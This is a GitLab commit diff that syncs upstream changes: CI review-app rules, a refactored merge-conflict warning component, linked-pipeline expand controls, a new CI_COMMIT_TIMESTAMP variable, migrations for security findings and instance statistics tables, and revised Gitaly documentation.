Add latest changes from gitlab-org/gitlab@master

This commit is contained in:
GitLab Bot 2020-09-01 18:10:48 +00:00
parent adfb0e182c
commit 304e230182
83 changed files with 1254 additions and 503 deletions

View File

@ -45,7 +45,7 @@ review-build-cng:
DOMAIN: "-${CI_ENVIRONMENT_SLUG}.${REVIEW_APPS_DOMAIN}"
GITLAB_HELM_CHART_REF: "v4.3.0"
environment:
name: review/${CI_COMMIT_REF_NAME}
name: review/${CI_COMMIT_REF_SLUG}${FREQUENCY}
url: https://gitlab-${CI_ENVIRONMENT_SLUG}.${REVIEW_APPS_DOMAIN}
on_stop: review-stop
auto_stop_in: 48 hours
@ -113,8 +113,8 @@ review-stop-failed-deployment:
review-stop:
extends:
- .review-stop-base
- .review:rules:mr-only-manual
stage: review
- .review:rules:review-stop
stage: post-qa
script:
- delete_release

View File

@ -753,6 +753,17 @@
- <<: *if-dot-com-gitlab-org-schedule
allow_failure: true
.review:rules:review-stop:
rules:
- <<: *if-not-ee
when: never
- <<: *if-dot-com-gitlab-org-merge-request
changes: *code-qa-patterns
when: manual
allow_failure: true
- <<: *if-master-refs
allow_failure: true
.review:rules:danger:
rules:
- if: '$DANGER_GITLAB_API_TOKEN && $CI_MERGE_REQUEST_IID'

View File

@ -1 +1 @@
851da3925944b969da7f87057ba8da8274d5c18d
15c2f3921c4729e9c4d7ce8592300decfcfdb2e6

View File

@ -1,6 +1,6 @@
<script>
import { mapState, mapGetters, mapActions } from 'vuex';
import { GlLoadingIcon, GlButton, GlAlert, GlPagination, GlSprintf } from '@gitlab/ui';
import { GlLoadingIcon, GlPagination, GlSprintf } from '@gitlab/ui';
import Mousetrap from 'mousetrap';
import { __ } from '~/locale';
import { getParameterByName, parseBoolean } from '~/lib/utils/common_utils';
@ -13,9 +13,12 @@ import eventHub from '../../notes/event_hub';
import CompareVersions from './compare_versions.vue';
import DiffFile from './diff_file.vue';
import NoChanges from './no_changes.vue';
import HiddenFilesWarning from './hidden_files_warning.vue';
import CommitWidget from './commit_widget.vue';
import TreeList from './tree_list.vue';
import HiddenFilesWarning from './hidden_files_warning.vue';
import MergeConflictWarning from './merge_conflict_warning.vue';
import {
TREE_LIST_WIDTH_STORAGE_KEY,
INITIAL_TREE_WIDTH,
@ -33,13 +36,12 @@ export default {
DiffFile,
NoChanges,
HiddenFilesWarning,
MergeConflictWarning,
CommitWidget,
TreeList,
GlLoadingIcon,
PanelResizer,
GlPagination,
GlButton,
GlAlert,
GlSprintf,
},
mixins: [glFeatureFlagsMixin()],
@ -422,49 +424,12 @@ export default {
:plain-diff-path="plainDiffPath"
:email-patch-path="emailPatchPath"
/>
<div
<merge-conflict-warning
v-if="isDiffHead && hasConflicts"
:class="{
[CENTERED_LIMITED_CONTAINER_CLASSES]: isLimitedContainer,
}"
>
<gl-alert
:dismissible="false"
:title="__('There are merge conflicts')"
variant="warning"
class="w-100 mb-3"
>
<p class="mb-1">
{{ __('The comparison view may be inaccurate due to merge conflicts.') }}
</p>
<p class="mb-0">
{{
__(
'Resolve these conflicts or ask someone with write access to this repository to merge it locally.',
)
}}
</p>
<template #actions>
<gl-button
v-if="conflictResolutionPath"
:href="conflictResolutionPath"
variant="info"
class="mr-3 gl-alert-action"
>
{{ __('Resolve conflicts') }}
</gl-button>
<gl-button
v-if="canMerge"
class="gl-alert-action"
data-toggle="modal"
data-target="#modal_merge_info"
>
{{ __('Merge locally') }}
</gl-button>
</template>
</gl-alert>
</div>
:limited="isLimitedContainer"
:resolution-path="conflictResolutionPath"
:mergeable="canMerge"
/>
<div
:data-can-create-note="getNoteableData.current_user.can_create_note"

View File

@ -94,11 +94,7 @@ export default {
},
'file.file_hash': {
handler: function watchFileHash() {
if (
this.glFeatures.autoExpandCollapsedDiffs &&
this.viewDiffsFileByFile &&
this.file.viewer.collapsed
) {
if (this.viewDiffsFileByFile && this.file.viewer.collapsed) {
this.isCollapsed = false;
this.handleLoadCollapsedDiff();
} else {
@ -108,7 +104,7 @@ export default {
immediate: true,
},
'file.viewer.collapsed': function setIsCollapsed(newVal) {
if (!this.viewDiffsFileByFile && !this.glFeatures.autoExpandCollapsedDiffs) {
if (!this.viewDiffsFileByFile) {
this.isCollapsed = newVal;
}
},

View File

@ -0,0 +1,72 @@
<script>
import { GlButton, GlAlert } from '@gitlab/ui';
import { CENTERED_LIMITED_CONTAINER_CLASSES } from '../constants';
export default {
components: {
GlAlert,
GlButton,
},
props: {
limited: {
type: Boolean,
required: true,
},
mergeable: {
type: Boolean,
required: true,
},
resolutionPath: {
type: String,
required: true,
},
},
computed: {
containerClasses() {
return {
[CENTERED_LIMITED_CONTAINER_CLASSES]: this.limited,
};
},
},
};
</script>
<template>
<div :class="containerClasses">
<gl-alert
:dismissible="false"
:title="__('There are merge conflicts')"
variant="warning"
class="gl-mb-5"
>
<p class="gl-mb-2">
{{ __('The comparison view may be inaccurate due to merge conflicts.') }}
</p>
<p class="gl-mb-0">
{{
__(
'Resolve these conflicts or ask someone with write access to this repository to merge it locally.',
)
}}
</p>
<template #actions>
<gl-button
v-if="resolutionPath"
:href="resolutionPath"
variant="info"
class="gl-mr-5 gl-alert-action"
>
{{ __('Resolve conflicts') }}
</gl-button>
<gl-button
v-if="mergeable"
class="gl-alert-action"
data-toggle="modal"
data-target="#modal_merge_info"
>
{{ __('Merge locally') }}
</gl-button>
</template>
</gl-alert>
</div>
</template>

View File

@ -44,6 +44,10 @@ export default {
return {
downstreamMarginTop: null,
jobName: null,
pipelineExpanded: {
jobName: '',
expanded: false,
},
};
},
computed: {
@ -120,6 +124,19 @@ export default {
setJob(jobName) {
this.jobName = jobName;
},
setPipelineExpanded(jobName, expanded) {
if (expanded) {
this.pipelineExpanded = {
jobName,
expanded,
};
} else {
this.pipelineExpanded = {
expanded,
jobName: '',
};
}
},
},
};
</script>
@ -181,6 +198,7 @@ export default {
:has-triggered-by="hasTriggeredBy"
:action="stage.status.action"
:job-hovered="jobName"
:pipeline-expanded="pipelineExpanded"
@refreshPipelineGraph="refreshPipelineGraph"
/>
</ul>
@ -193,6 +211,7 @@ export default {
graph-position="right"
@linkedPipelineClick="handleClickedDownstream"
@downstreamHovered="setJob"
@pipelineExpandToggle="setPipelineExpanded"
/>
<pipeline-graph

View File

@ -31,7 +31,7 @@ import delayedJobMixin from '~/jobs/mixins/delayed_job_mixin';
*/
export default {
hoverClass: 'gl-inset-border-1-blue-500',
hoverClass: 'gl-shadow-x0-y0-b3-s1-blue-500',
components: {
ActionComponent,
JobNameComponent,
@ -61,6 +61,11 @@ export default {
required: false,
default: '',
},
pipelineExpanded: {
type: Object,
required: false,
default: () => ({}),
},
},
computed: {
boundary() {
@ -101,8 +106,14 @@ export default {
hasAction() {
return this.job.status && this.job.status.action && this.job.status.action.path;
},
relatedDownstreamHovered() {
return this.job.name === this.jobHovered;
},
relatedDownstreamExpanded() {
return this.job.name === this.pipelineExpanded.jobName && this.pipelineExpanded.expanded;
},
jobClasses() {
return this.job.name === this.jobHovered
return this.relatedDownstreamHovered || this.relatedDownstreamExpanded
? `${this.$options.hoverClass} ${this.cssClassJobName}`
: this.cssClassJobName;
},

View File

@ -1,5 +1,5 @@
<script>
import { GlTooltipDirective, GlButton } from '@gitlab/ui';
import { GlTooltipDirective, GlButton, GlLink, GlLoadingIcon } from '@gitlab/ui';
import CiStatus from '~/vue_shared/components/ci_icon.vue';
import { __, sprintf } from '~/locale';
@ -10,6 +10,8 @@ export default {
components: {
CiStatus,
GlButton,
GlLink,
GlLoadingIcon,
},
props: {
pipeline: {
@ -25,6 +27,11 @@ export default {
required: true,
},
},
data() {
return {
expanded: false,
};
},
computed: {
tooltipText() {
return `${this.downstreamTitle} #${this.pipeline.id} - ${this.pipelineStatus.label}
@ -66,11 +73,22 @@ export default {
? sprintf(__('Created by %{job}'), { job: this.pipeline.source_job.name })
: '';
},
expandedIcon() {
if (this.parentPipeline) {
return this.expanded ? 'angle-right' : 'angle-left';
}
return this.expanded ? 'angle-left' : 'angle-right';
},
expandButtonPosition() {
return this.parentPipeline ? 'gl-left-0 gl-border-r-1!' : 'gl-right-0 gl-border-l-1!';
},
},
methods: {
onClickLinkedPipeline() {
this.$root.$emit('bv::hide::tooltip', this.buttonId);
this.expanded = !this.expanded;
this.$emit('pipelineClicked', this.$refs.linkedPipeline);
this.$emit('pipelineExpandToggle', this.pipeline.source_job.name, this.expanded);
},
hideTooltips() {
this.$root.$emit('bv::hide::tooltip');
@ -88,27 +106,53 @@ export default {
<template>
<li
ref="linkedPipeline"
v-gl-tooltip
class="linked-pipeline build"
:title="tooltipText"
:class="{ 'downstream-pipeline': isDownstream }"
data-qa-selector="child_pipeline"
@mouseover="onDownstreamHovered"
@mouseleave="onDownstreamHoverLeave"
>
<gl-button
:id="buttonId"
v-gl-tooltip
:title="tooltipText"
class="linked-pipeline-content"
data-qa-selector="linked_pipeline_button"
:class="`js-pipeline-expand-${pipeline.id}`"
:loading="pipeline.isLoading"
@click="onClickLinkedPipeline"
<div
class="gl-relative gl-bg-white gl-p-3 gl-border-solid gl-border-gray-100 gl-border-1"
:class="{ 'gl-pl-9': parentPipeline }"
>
<ci-status v-if="!pipeline.isLoading" :status="pipelineStatus" css-classes="gl-top-0" />
<span class="str-truncated"> {{ downstreamTitle }} &#8226; #{{ pipeline.id }} </span>
<div class="gl-display-flex">
<ci-status
v-if="!pipeline.isLoading"
:status="pipelineStatus"
css-classes="gl-top-0 gl-pr-2"
/>
<div v-else class="gl-pr-2"><gl-loading-icon inline /></div>
<div class="gl-display-flex gl-flex-direction-column gl-w-13">
<span class="gl-text-truncate">
{{ downstreamTitle }}
</span>
<div class="gl-text-truncate">
<gl-link
v-if="childPipeline"
class="gl-text-blue-500!"
:href="pipeline.path"
data-testid="childPipelineLink"
>#{{ pipeline.id }}</gl-link
>
<span v-else>#{{ pipeline.id }}</span>
</div>
</div>
</div>
<div class="gl-pt-2">
<span class="badge badge-primary" data-testid="downstream-pipeline-label">{{ label }}</span>
</div>
</gl-button>
<gl-button
:id="buttonId"
class="gl-absolute gl-top-0 gl-bottom-0 gl-shadow-none! gl-rounded-0!"
:class="`js-pipeline-expand-${pipeline.id} ${expandButtonPosition}`"
:icon="expandedIcon"
data-testid="expandPipelineButton"
data-qa-selector="linked_pipeline_button"
@click="onClickLinkedPipeline"
/>
</div>
</li>
</template>

View File

@ -44,6 +44,9 @@ export default {
onDownstreamHovered(jobName) {
this.$emit('downstreamHovered', jobName);
},
onPipelineExpandToggle(jobName, expanded) {
this.$emit('pipelineExpandToggle', jobName, expanded);
},
},
};
</script>
@ -65,6 +68,7 @@ export default {
:project-id="projectId"
@pipelineClicked="onPipelineClick($event, pipeline, index)"
@downstreamHovered="onDownstreamHovered"
@pipelineExpandToggle="onPipelineExpandToggle"
/>
</ul>
</div>

View File

@ -41,6 +41,11 @@ export default {
required: false,
default: '',
},
pipelineExpanded: {
type: Object,
required: false,
default: () => ({}),
},
},
computed: {
hasAction() {
@ -86,6 +91,7 @@ export default {
v-if="group.size === 1"
:job="group.jobs[0]"
:job-hovered="jobHovered"
:pipeline-expanded="pipelineExpanded"
css-class-job-name="build-content"
@pipelineActionRequestComplete="pipelineActionRequestComplete"
/>

View File

@ -108,7 +108,9 @@ export default {
</div>
</template>
<div class="row">
<div class="col-md-5 order-md-last col-12 gl-mt-5 mt-md-n1 pt-md-1 svg-content svg-225">
<div
class="col-md-5 order-md-last col-12 gl-mt-5 gl-mt-md-n2! gl-pt-md-2 svg-content svg-225"
>
<img data-testid="pipeline-image" :src="pipelineSvgPath" />
</div>
<div class="col-md-7 order-md-first col-12">

View File

@ -119,3 +119,7 @@
width: auto !important;
}
}
.gl-shadow-x0-y0-b3-s1-blue-500 {
box-shadow: inset 0 0 3px $gl-border-size-1 $blue-500;
}

View File

@ -34,7 +34,6 @@ class Projects::MergeRequestsController < Projects::MergeRequests::ApplicationCo
push_frontend_feature_flag(:multiline_comments, @project, default_enabled: true)
push_frontend_feature_flag(:file_identifier_hash)
push_frontend_feature_flag(:batch_suggestions, @project, default_enabled: true)
push_frontend_feature_flag(:auto_expand_collapsed_diffs, @project, default_enabled: true)
push_frontend_feature_flag(:approvals_commented_by, @project, default_enabled: true)
push_frontend_feature_flag(:hide_jump_to_next_unresolved_in_threads, default_enabled: true)
push_frontend_feature_flag(:merge_request_widget_graphql, @project)

View File

@ -0,0 +1,9 @@
# frozen_string_literal: true
module Analytics
module InstanceStatistics
def self.table_name_prefix
'analytics_instance_statistics_'
end
end
end

View File

@ -0,0 +1,12 @@
# frozen_string_literal: true
module Analytics
module InstanceStatistics
class Measurement < ApplicationRecord
enum identifier: { projects: 1, users: 2 }
validates :recorded_at, :identifier, :count, presence: true
validates :recorded_at, uniqueness: { scope: :identifier }
end
end
end

View File

@ -647,6 +647,10 @@ module Ci
!artifacts_expired? && artifacts_file&.exists?
end
def locked_artifacts?
pipeline.artifacts_locked? && artifacts_file&.exists?
end
# This method is similar to #artifacts? but it includes the artifacts
# locking mechanics. A new method was created to prevent breaking existing
# behavior and avoid introducing N+1s.

View File

@ -491,6 +491,12 @@ module Ci
end
end
def git_commit_timestamp
strong_memoize(:git_commit_timestamp) do
commit.try(:timestamp)
end
end
def before_sha
super || Gitlab::Git::BLANK_SHA
end
@ -768,6 +774,7 @@ module Ci
variables.append(key: 'CI_COMMIT_TITLE', value: git_commit_full_title.to_s)
variables.append(key: 'CI_COMMIT_DESCRIPTION', value: git_commit_description.to_s)
variables.append(key: 'CI_COMMIT_REF_PROTECTED', value: (!!protected_ref?).to_s)
variables.append(key: 'CI_COMMIT_TIMESTAMP', value: git_commit_timestamp.to_s)
# legacy variables
variables.append(key: 'CI_BUILD_REF', value: sha)
@ -860,6 +867,10 @@ module Ci
builds.latest.with_reports(reports_scope)
end
def builds_with_coverage
builds.with_coverage
end
def has_reports?(reports_scope)
complete? && latest_report_builds(reports_scope).exists?
end

View File

@ -221,12 +221,16 @@ class Commit
description.present?
end
def timestamp
committed_date.xmlschema
end
def hook_attrs(with_changed_files: false)
data = {
id: id,
message: safe_message,
title: title,
timestamp: committed_date.xmlschema,
timestamp: timestamp,
url: Gitlab::UrlBuilder.build(self),
author: {
name: author_name,

View File

@ -295,7 +295,7 @@ class MergeRequest < ApplicationRecord
alias_attribute :auto_merge_enabled, :merge_when_pipeline_succeeds
alias_method :issuing_parent, :target_project
delegate :active?, to: :head_pipeline, prefix: true, allow_nil: true
delegate :active?, :builds_with_coverage, to: :head_pipeline, prefix: true, allow_nil: true
delegate :success?, :active?, to: :actual_head_pipeline, prefix: true, allow_nil: true
RebaseLockTimeout = Class.new(StandardError)

View File

@ -0,0 +1,5 @@
# frozen_string_literal: true
class BuildCoverageEntity < Grape::Entity
expose :name, :coverage
end

View File

@ -27,15 +27,15 @@ class BuildDetailsEntity < JobEntity
end
expose :artifact, if: -> (*) { can?(current_user, :read_build, build) } do
expose :download_path, if: -> (*) { build.pipeline.artifacts_locked? || build.artifacts? } do |build|
expose :download_path, if: -> (*) { build.locked_artifacts? || build.artifacts? } do |build|
download_project_job_artifacts_path(project, build)
end
expose :browse_path, if: -> (*) { build.pipeline.artifacts_locked? || build.browsable_artifacts? } do |build|
expose :browse_path, if: -> (*) { build.locked_artifacts? || build.browsable_artifacts? } do |build|
browse_project_job_artifacts_path(project, build)
end
expose :keep_path, if: -> (*) { build.has_expiring_archive_artifacts? && can?(current_user, :update_build, build) } do |build|
expose :keep_path, if: -> (*) { (build.locked_artifacts? || build.has_expiring_archive_artifacts?) && can?(current_user, :update_build, build) } do |build|
keep_project_job_artifacts_path(project, build)
end

View File

@ -73,6 +73,8 @@ class MergeRequestPollWidgetEntity < Grape::Entity
presenter(merge_request).pipeline_coverage_delta
end
expose :head_pipeline_builds_with_coverage, as: :builds_with_coverage, using: BuildCoverageEntity
expose :cancel_auto_merge_path do |merge_request|
presenter(merge_request).cancel_auto_merge_path
end

View File

@ -2,14 +2,7 @@
.gl-alert.gl-alert-danger.outdated-browser{ :role => "alert" }
= sprite_icon('error', css_class: "gl-alert-icon gl-alert-icon-no-title gl-icon")
.gl-alert-body
- if browser.ie? && browser.version.to_i == 11
- feedback_link_url = 'https://gitlab.com/gitlab-org/gitlab/issues/197987'
- feedback_link_start = '<a href="%{url}" class="gl-link" target="_blank" rel="noopener noreferrer">'.html_safe % { url: feedback_link_url }
= s_('OutdatedBrowser|From May 2020 GitLab no longer supports Internet Explorer 11.')
%br
= s_('OutdatedBrowser|You can provide feedback %{feedback_link_start}on this issue%{feedback_link_end} or via your usual support channels.').html_safe % { feedback_link_start: feedback_link_start, feedback_link_end: '</a>'.html_safe }
- else
= s_('OutdatedBrowser|GitLab may not work properly, because you are using an outdated web browser.')
= s_('OutdatedBrowser|GitLab may not work properly, because you are using an outdated web browser.')
%br
- browser_link_start = '<a href="%{url}" target="_blank" rel="noopener noreferrer">'.html_safe % { url: help_page_path('install/requirements', anchor: 'supported-web-browsers') }
= s_('OutdatedBrowser|Please install a %{browser_link_start}supported web browser%{browser_link_end} for a better experience.').html_safe % { browser_link_start: browser_link_start, browser_link_end: '</a>'.html_safe }

View File

@ -0,0 +1,5 @@
---
title: Create `security_findings` table
merge_request: 40368
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Create table for storing Instance Statistics object counts
merge_request: 40605
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Add CI_COMMIT_TIMESTAMP CI variable
merge_request: 40388
author: Nasko Vasilev
type: added

View File

@ -0,0 +1,5 @@
---
title: Fix issue causing 'Expand All' button to not work in MR diffs view (Remove `autoExpandCollapsedDiffs` feature flag)
merge_request: 40960
author:
type: fixed

View File

@ -0,0 +1,5 @@
---
title: Return builds with coverage in MR widget JSON response
merge_request: 40533
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Show keep button for locked artifacts.
merge_request: 40962
author:
type: changed

View File

@ -0,0 +1,5 @@
---
title: Improve ability to navigate to child pipelines
merge_request: 40650
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Fix visibility param for ProjectSnippet REST endpoint
merge_request: 40966
author:
type: fixed

View File

@ -0,0 +1,25 @@
# frozen_string_literal: true
require './spec/support/sidekiq_middleware'
Gitlab::Seeder.quiet do
model_class = Analytics::InstanceStatistics::Measurement
recorded_at = Date.today
# Insert random counts for the last 10 weeks
measurements = 10.times.flat_map do
recorded_at = (recorded_at - 1.week).end_of_week.end_of_day - 5.minutes
model_class.identifiers.map do |_, id|
{
recorded_at: recorded_at,
count: rand(1_000_000),
identifier: id
}
end
end
model_class.upsert_all(measurements, unique_by: [:identifier, :recorded_at])
print '.'
end

View File

@ -0,0 +1,27 @@
# frozen_string_literal: true
class CreateSecurityFindingsTable < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
disable_ddl_transaction!
def up
unless table_exists?(:security_findings)
create_table :security_findings do |t|
t.references :scan, null: false
t.references :scanner, null: false
t.integer :severity, limit: 2, index: true, null: false
t.integer :confidence, limit: 2, index: true, null: false
t.text :project_fingerprint, index: true, null: false
end
end
add_text_limit :security_findings, :project_fingerprint, 40
end
def down
drop_table :security_findings
end
end

View File

@ -0,0 +1,16 @@
# frozen_string_literal: true
class CreateAnalyticsInstanceStatisticsMeasurements < ActiveRecord::Migration[6.0]
DOWNTIME = false
UNIQUE_INDEX_NAME = 'index_on_instance_statistics_recorded_at_and_identifier'
def change
create_table :analytics_instance_statistics_measurements do |t|
t.bigint :count, null: false
t.datetime_with_timezone :recorded_at, null: false
t.integer :identifier, limit: 2, null: false
end
add_index :analytics_instance_statistics_measurements, [:identifier, :recorded_at], unique: true, name: UNIQUE_INDEX_NAME
end
end

View File

@ -0,0 +1,19 @@
# frozen_string_literal: true
class AddForeignKeyOnScanIdToSecurityScans < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
def up
with_lock_retries do
add_foreign_key :security_findings, :security_scans, column: :scan_id, on_delete: :cascade # rubocop:disable Migration/AddConcurrentForeignKey
end
end
def down
with_lock_retries do
remove_foreign_key :security_findings, column: :scan_id
end
end
end

View File

@ -0,0 +1,19 @@
# frozen_string_literal: true
class AddForeignKeyOnScannerIdToVulnerabilityScanners < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
def up
with_lock_retries do
add_foreign_key :security_findings, :vulnerability_scanners, column: :scanner_id, on_delete: :cascade # rubocop:disable Migration/AddConcurrentForeignKey
end
end
def down
with_lock_retries do
remove_foreign_key :security_findings, column: :scanner_id
end
end
end

View File

@ -0,0 +1 @@
d5e81848257b3391d99b198b177531a4c190ca6f19b27c9aedaa931f6eb3165a

View File

@ -0,0 +1 @@
f581bd5f5ec26dc33643c77fb8c7a64a9053b55c3f6a7281fea89ac4790a58d2

View File

@ -0,0 +1 @@
b3ee994231a8da694dbcda227b37e19a2112be666648d918425b064ec19d239e

View File

@ -0,0 +1 @@
b575558752206149171a05231e4167e1ac3e1295f76d800edfe3d61c1b996b52

View File

@ -8930,6 +8930,22 @@ CREATE SEQUENCE public.analytics_cycle_analytics_project_stages_id_seq
ALTER SEQUENCE public.analytics_cycle_analytics_project_stages_id_seq OWNED BY public.analytics_cycle_analytics_project_stages.id;
CREATE TABLE public.analytics_instance_statistics_measurements (
id bigint NOT NULL,
count bigint NOT NULL,
recorded_at timestamp with time zone NOT NULL,
identifier smallint NOT NULL
);
CREATE SEQUENCE public.analytics_instance_statistics_measurements_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.analytics_instance_statistics_measurements_id_seq OWNED BY public.analytics_instance_statistics_measurements.id;
CREATE TABLE public.analytics_language_trend_repository_languages (
file_count integer DEFAULT 0 NOT NULL,
programming_language_id bigint NOT NULL,
@ -15371,6 +15387,25 @@ CREATE SEQUENCE public.scim_oauth_access_tokens_id_seq
ALTER SEQUENCE public.scim_oauth_access_tokens_id_seq OWNED BY public.scim_oauth_access_tokens.id;
CREATE TABLE public.security_findings (
id bigint NOT NULL,
scan_id bigint NOT NULL,
scanner_id bigint NOT NULL,
severity smallint NOT NULL,
confidence smallint NOT NULL,
project_fingerprint text NOT NULL,
CONSTRAINT check_b9508c6df8 CHECK ((char_length(project_fingerprint) <= 40))
);
CREATE SEQUENCE public.security_findings_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.security_findings_id_seq OWNED BY public.security_findings.id;
CREATE TABLE public.security_scans (
id bigint NOT NULL,
created_at timestamp with time zone NOT NULL,
@ -16814,6 +16849,8 @@ ALTER TABLE ONLY public.analytics_cycle_analytics_group_value_streams ALTER COLU
ALTER TABLE ONLY public.analytics_cycle_analytics_project_stages ALTER COLUMN id SET DEFAULT nextval('public.analytics_cycle_analytics_project_stages_id_seq'::regclass);
ALTER TABLE ONLY public.analytics_instance_statistics_measurements ALTER COLUMN id SET DEFAULT nextval('public.analytics_instance_statistics_measurements_id_seq'::regclass);
ALTER TABLE ONLY public.appearances ALTER COLUMN id SET DEFAULT nextval('public.appearances_id_seq'::regclass);
ALTER TABLE ONLY public.application_setting_terms ALTER COLUMN id SET DEFAULT nextval('public.application_setting_terms_id_seq'::regclass);
@ -17368,6 +17405,8 @@ ALTER TABLE ONLY public.scim_identities ALTER COLUMN id SET DEFAULT nextval('pub
ALTER TABLE ONLY public.scim_oauth_access_tokens ALTER COLUMN id SET DEFAULT nextval('public.scim_oauth_access_tokens_id_seq'::regclass);
ALTER TABLE ONLY public.security_findings ALTER COLUMN id SET DEFAULT nextval('public.security_findings_id_seq'::regclass);
ALTER TABLE ONLY public.security_scans ALTER COLUMN id SET DEFAULT nextval('public.security_scans_id_seq'::regclass);
ALTER TABLE ONLY public.self_managed_prometheus_alert_events ALTER COLUMN id SET DEFAULT nextval('public.self_managed_prometheus_alert_events_id_seq'::regclass);
@ -17712,6 +17751,9 @@ ALTER TABLE ONLY public.analytics_cycle_analytics_group_value_streams
ALTER TABLE ONLY public.analytics_cycle_analytics_project_stages
ADD CONSTRAINT analytics_cycle_analytics_project_stages_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.analytics_instance_statistics_measurements
ADD CONSTRAINT analytics_instance_statistics_measurements_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.appearances
ADD CONSTRAINT appearances_pkey PRIMARY KEY (id);
@ -18627,6 +18669,9 @@ ALTER TABLE ONLY public.scim_identities
ALTER TABLE ONLY public.scim_oauth_access_tokens
ADD CONSTRAINT scim_oauth_access_tokens_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.security_findings
ADD CONSTRAINT security_findings_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.security_scans
ADD CONSTRAINT security_scans_pkey PRIMARY KEY (id);
@ -20325,6 +20370,8 @@ CREATE INDEX index_on_id_partial_with_legacy_storage ON public.projects USING bt
CREATE INDEX index_on_identities_lower_extern_uid_and_provider ON public.identities USING btree (lower((extern_uid)::text), provider);
CREATE UNIQUE INDEX index_on_instance_statistics_recorded_at_and_identifier ON public.analytics_instance_statistics_measurements USING btree (identifier, recorded_at);
CREATE INDEX index_on_users_name_lower ON public.users USING btree (lower((name)::text));
CREATE INDEX index_open_project_tracker_data_on_service_id ON public.open_project_tracker_data USING btree (service_id);
@ -20797,6 +20844,16 @@ CREATE INDEX index_secure_ci_builds_on_user_id_created_at_parser_features ON pub
CREATE INDEX index_security_ci_builds_on_name_and_id_parser_features ON public.ci_builds USING btree (name, id) WHERE (((name)::text = ANY (ARRAY[('container_scanning'::character varying)::text, ('dast'::character varying)::text, ('dependency_scanning'::character varying)::text, ('license_management'::character varying)::text, ('sast'::character varying)::text, ('secret_detection'::character varying)::text, ('coverage_fuzzing'::character varying)::text, ('license_scanning'::character varying)::text])) AND ((type)::text = 'Ci::Build'::text));
CREATE INDEX index_security_findings_on_confidence ON public.security_findings USING btree (confidence);
CREATE INDEX index_security_findings_on_project_fingerprint ON public.security_findings USING btree (project_fingerprint);
CREATE INDEX index_security_findings_on_scan_id ON public.security_findings USING btree (scan_id);
CREATE INDEX index_security_findings_on_scanner_id ON public.security_findings USING btree (scanner_id);
CREATE INDEX index_security_findings_on_severity ON public.security_findings USING btree (severity);
CREATE INDEX index_self_managed_prometheus_alert_events_on_environment_id ON public.self_managed_prometheus_alert_events USING btree (environment_id);
CREATE INDEX index_sent_notifications_on_noteable_type_noteable_id ON public.sent_notifications USING btree (noteable_id) WHERE ((noteable_type)::text = 'Issue'::text);
@ -22674,6 +22731,9 @@ ALTER TABLE ONLY public.list_user_preferences
ALTER TABLE ONLY public.project_custom_attributes
ADD CONSTRAINT fk_rails_719c3dccc5 FOREIGN KEY (project_id) REFERENCES public.projects(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.security_findings
ADD CONSTRAINT fk_rails_729b763a54 FOREIGN KEY (scanner_id) REFERENCES public.vulnerability_scanners(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.dast_scanner_profiles
ADD CONSTRAINT fk_rails_72a8ba7141 FOREIGN KEY (project_id) REFERENCES public.projects(id) ON DELETE CASCADE;
@ -23007,6 +23067,9 @@ ALTER TABLE ONLY public.approval_project_rules_users
ALTER TABLE ONLY public.lists
ADD CONSTRAINT fk_rails_baed5f39b7 FOREIGN KEY (milestone_id) REFERENCES public.milestones(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.security_findings
ADD CONSTRAINT fk_rails_bb63863cf1 FOREIGN KEY (scan_id) REFERENCES public.security_scans(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.approval_merge_request_rules_users
ADD CONSTRAINT fk_rails_bc8972fa55 FOREIGN KEY (user_id) REFERENCES public.users(id) ON DELETE CASCADE;

View File

@ -348,50 +348,51 @@ are supported and can be added if needed.
## Configure Gitaly
Deploying Gitaly in its own server can benefit GitLab installations that are
larger than a single machine. Gitaly node requirements are dependent on data,
specifically the number of projects and their sizes. It's recommended that each
Gitaly node store no more than 5TB of data. Your 2K setup may require one or more
nodes depending on your repository storage requirements.
[Gitaly](../gitaly/index.md) server node requirements are dependent on data,
specifically the number of projects and those projects' sizes. It's recommended
that a Gitaly server node stores no more than 5TB of data. Although this
reference architecture includes a single Gitaly server node, you may require
additional nodes depending on your repository storage requirements.
We strongly recommend that all Gitaly nodes should be set up with SSD disks with a throughput of at least
8,000 IOPS for read operations and 2,000 IOPS for write, as Gitaly has heavy I/O.
These IOPS values are recommended only as a starter as with time they may be
adjusted higher or lower depending on the scale of your environment's workload.
If you're running the environment on a Cloud provider
you may need to refer to their documentation on how configure IOPS correctly.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
should have a throughput of at least 8,000
input/output operations per second (IOPS) for read operations and 2,000 IOPS
for write operations. These IOPS values are initial recommendations, and may be
adjusted to greater or lesser values depending on the scale of your
environment's workload. If you're running the environment on a Cloud provider,
refer to their documentation about how to configure IOPS correctly.
Some things to note:
Be sure to note the following items:
- The GitLab Rails application shards repositories into [repository storages](../repository_storage_paths.md).
- A Gitaly server can host one or more storages.
- A GitLab server can use one or more Gitaly servers.
- Gitaly addresses must be specified in such a way that they resolve
correctly for ALL Gitaly clients.
- The GitLab Rails application shards repositories into
[repository storage paths](../repository_storage_paths.md).
- A Gitaly server can host one or more storage paths.
- A GitLab server can use one or more Gitaly server nodes.
- Gitaly addresses must be specified to be correctly resolvable for *all*
Gitaly clients.
- Gitaly servers must not be exposed to the public internet, as Gitaly's network
traffic is unencrypted by default. The use of a firewall is highly recommended
to restrict access to the Gitaly server. Another option is to
[use TLS](#gitaly-tls-support).
TIP: **Tip:**
For more information about Gitaly's history and network architecture see the
